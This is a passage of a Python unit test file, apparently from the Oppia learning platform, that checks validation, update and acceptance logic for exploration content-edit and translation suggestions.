expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = 'invalid_cmd'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected cmd to be edit_state_property'
):
suggestion.validate()
def test_validate_change_property_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.property_name = 'invalid_property'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected property_name to be content'
):
suggestion.validate()
def test_validate_language_code_fails_when_language_codes_do_not_match(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.language_code = 'wrong_language_code'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected language_code to be None, received wrong_language_code'
):
suggestion.validate()
def test_pre_accept_validate_state_name(self):
self.save_new_default_exploration('exp1', self.author_id)
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
exp_services.update_exploration(
self.author_id, 'exp1', [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_ADD_STATE,
'state_name': 'State A',
})
], 'Added state')
suggestion.change.state_name = 'State A'
suggestion.pre_accept_validate()
suggestion.change.state_name = 'invalid_state_name'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected invalid_state_name to be a valid state name'
):
suggestion.pre_accept_validate()
def test_populate_old_value_of_change_with_invalid_state(self):
self.save_new_default_exploration('exp1', self.author_id)
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.change.state_name = 'invalid_state_name'
self.assertIsNone(suggestion.change.old_value)
suggestion.populate_old_value_of_change()
self.assertIsNone(suggestion.change.old_value)
def test_pre_update_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_STATE,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': suggestion.change.state_name,
'new_value': 'new suggestion content',
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError,
'The following extra attributes are present: new_value, '
'old_value, property_name'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_property_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_PARAM_CHANGES,
'state_name': suggestion.change.state_name,
'new_value': 'new suggestion content',
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change property_name must be equal to content'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_state_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'invalid_state',
'new_value': 'new suggestion content',
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change state_name must be equal to state_1'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_new_value(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
new_content = state_domain.SubtitledHtml(
'content', '<p>new suggestion html</p>').to_dict()
suggestion.change.new_value = new_content
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': suggestion.change.state_name,
'new_value': new_content,
'old_value': None
}
with self.assertRaisesRegex(
utils.ValidationError, 'The new html must not match the old html'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_non_equal_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
with self.assertRaisesRegex(
utils.ValidationError,
'The new change cmd must be equal to edit_state_property'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY,
'property_name': 'title',
'new_value': 'Exploration 1 Albert title'
}))
def test_get_all_html_content_strings(self):
change_dict = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': {
'content_id': 'content',
'html': 'new suggestion content'
},
'old_value': None
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [u'new suggestion content']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_convert_html_in_suggestion_change(self):
html_content = (
'<p>Value</p><oppia-noninteractive-math raw_latex-with-value="&a'
'mp;quot;+,-,-,+&quot;"></oppia-noninteractive-math>')
expected_html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;&quot;}"></oppia'
'-noninteractive-math>')
change = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>suggestion</p>'
},
'old_value': {
'content_id': 'content',
'html': html_content
}
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
suggestion.convert_html_in_suggestion_change(
html_validation_service.
add_math_content_to_math_rte_components)
self.assertEqual(
suggestion.change.old_value['html'], expected_html_content)
def test_get_target_entity_html_strings_returns_expected_strings(self):
change_dict = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': {
'content_id': 'content',
'html': 'new suggestion content'
},
'old_value': {
'content_id': 'content',
'html': 'Old content.'
}
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_target_entity_html_strings()
expected_outcome_list = [u'Old content.']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_get_target_entity_html_with_none_old_value(self):
change_dict = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': {
'content_id': 'content',
'html': 'new suggestion content'
},
'old_value': None
}
suggestion = suggestion_registry.SuggestionEditStateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, change_dict,
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_target_entity_html_strings()
self.assertEqual(actual_outcome_list, [])
class SuggestionTranslateContentUnitTests(test_utils.GenericTestBase):
"""Tests for the SuggestionEditStateContent class."""
AUTHOR_EMAIL = '[email protected]'
REVIEWER_EMAIL = '[email protected]'
ASSIGNED_REVIEWER_EMAIL = '[email protected]'
fake_date = datetime.datetime(2016, 4, 10, 0, 0, 0, 0)
def setUp(self):
super(SuggestionTranslateContentUnitTests, self).setUp()
self.signup(self.AUTHOR_EMAIL, 'author')
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.suggestion_dict = {
'suggestion_id': 'exploration.exp1.thread1',
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>This is a content.</p>',
'translation_html': '<p>This is translated html.</p>',
'data_format': 'html'
},
'score_category': 'translation.Algebra',
'language_code': 'hi',
'last_updated': utils.get_time_in_millisecs(self.fake_date),
'edited_by_reviewer': False
}
def test_pre_update_validate_fails_for_invalid_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_STATE,
'state_name': 'Introduction'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change cmd must be equal to %s' % (
exp_domain.CMD_ADD_WRITTEN_TRANSLATION)
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_state_name(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'State 1',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>This is a content.</p>',
'translation_html': '<p>This is the updated translated html.</p>',
'data_format': 'html'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change state_name must be equal to Introduction'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_language_code(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'en',
'content_html': '<p>This is a content.</p>',
'translation_html': '<p>This is the updated translated html.</p>',
'data_format': 'html'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The language code must be equal to hi'
):
suggestion.pre_update_validate(exp_domain.ExplorationChange(change))
def test_pre_update_validate_change_content_html(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], self.fake_date)
change = {
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'en',
'content_html': '<p>This is the changed content.</p>',
'translation_html': '<p>This is the updated translated html.</p>',
'data_format': 'html'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change content_html must be equal to <p>This is a ' +
'content.</p>'
):
suggestion.pre_update_validate(
exp_domain.ExplorationChange(change))
def test_create_suggestion_add_translation(self):
expected_suggestion_dict = self.suggestion_dict
observed_suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertDictEqual(
observed_suggestion.to_dict(), expected_suggestion_dict)
def test_validate_suggestion_add_translation(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
def test_get_score_part_helper_methods(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertEqual(suggestion.get_score_type(), 'translation')
self.assertEqual(suggestion.get_score_sub_type(), 'Algebra')
def test_validate_suggestion_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.suggestion_type = 'invalid_suggestion_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected suggestion_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_type = 'invalid_target_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected target_id to be a string'
):
suggestion.validate()
def test_validate_target_version_at_submission(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_version_at_submission = 'invalid_version'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_version_at_submission to be an int'
):
suggestion.validate()
def test_validate_status(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.status = 'invalid_status'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected status to be among allowed choices'
):
suggestion.validate()
def test_validate_author_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'
):
suggestion.validate()
def test_validate_author_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected author_id to be in a valid user ID format.'
):
suggestion.validate()
def test_validate_final_reviewer_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'
):
suggestion.validate()
def test_validate_final_reviewer_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be in a valid user ID format'
):
suggestion.validate()
def test_validate_score_category(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected score_category to be a string'
):
suggestion.validate()
def test_validate_score_category_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'score.score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
suggestion.score_category = 'invalid_score_category'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
def test_validate_score_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'invalid_score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be among allowed'
' choices'
):
suggestion.validate()
def test_validate_change(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change = {}
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to be an ExplorationChange'
):
suggestion.validate()
def test_validate_score_type_translation(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'question.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be translation'
):
suggestion.validate()
def test_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = 'invalid_cmd'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected cmd to be add_written_translation'
):
suggestion.validate()
def test_validate_language_code_fails_when_language_codes_do_not_match(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
expected_language_code = (
expected_suggestion_dict['change']['language_code']
)
suggestion.validate()
suggestion.language_code = 'wrong_language_code'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected language_code to be %s, '
'received wrong_language_code' % expected_language_code
):
suggestion.validate()
def test_validate_language_code_fails_when_language_code_is_set_to_none(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.language_code = None
with self.assertRaisesRegex(
utils.ValidationError, 'language_code cannot be None'
):
suggestion.validate()
def test_validate_change_with_invalid_language_code_fails_validation(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.language_code = 'invalid_code'
with self.assertRaisesRegex(
utils.ValidationError, 'Invalid language_code: invalid_code'
):
suggestion.validate()
def test_pre_accept_validate_state_name(self):
self.save_new_default_exploration('exp1', self.author_id)
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionTranslateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
exp_services.update_exploration(
self.author_id, 'exp1', [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_ADD_STATE,
'state_name': 'State A',
}),
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'new_value': {
'content_id': 'content',
'html': '<p>This is a content.</p>'
},
'state_name': 'State A',
})
], 'Added state')
suggestion.change.state_name = 'State A'
suggestion.pre_accept_validate()
suggestion.change.state_name = 'invalid_state_name'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected invalid_state_name to be a valid state name'
):
suggestion.pre_accept_validate()
def test_accept_suggestion_adds_translation_in_exploration(self):
self.save_new_default_exploration('exp1', self.author_id)
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {})
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept(
'Accepted suggestion by translator: Add translation change.')
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {
'hi': 1
})
def test_accept_suggestion_with_set_of_string_adds_translation(self):
self.save_new_default_exploration('exp1', self.author_id)
exploration = exp_fetchers.get_exploration_by_id('exp1')
self.assertEqual(exploration.get_translation_counts(), {})
suggestion = suggestion_registry.SuggestionTranslateContent(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id,
{
'cmd': exp_domain.CMD_ADD_WRITTEN_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': ['text1', 'text2'],
'translation_html': ['translated text1', 'translated text2'],
'data_format': 'set_of_normalized_string'
},
self.suggestion_dict['score_category'],
self.suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept(
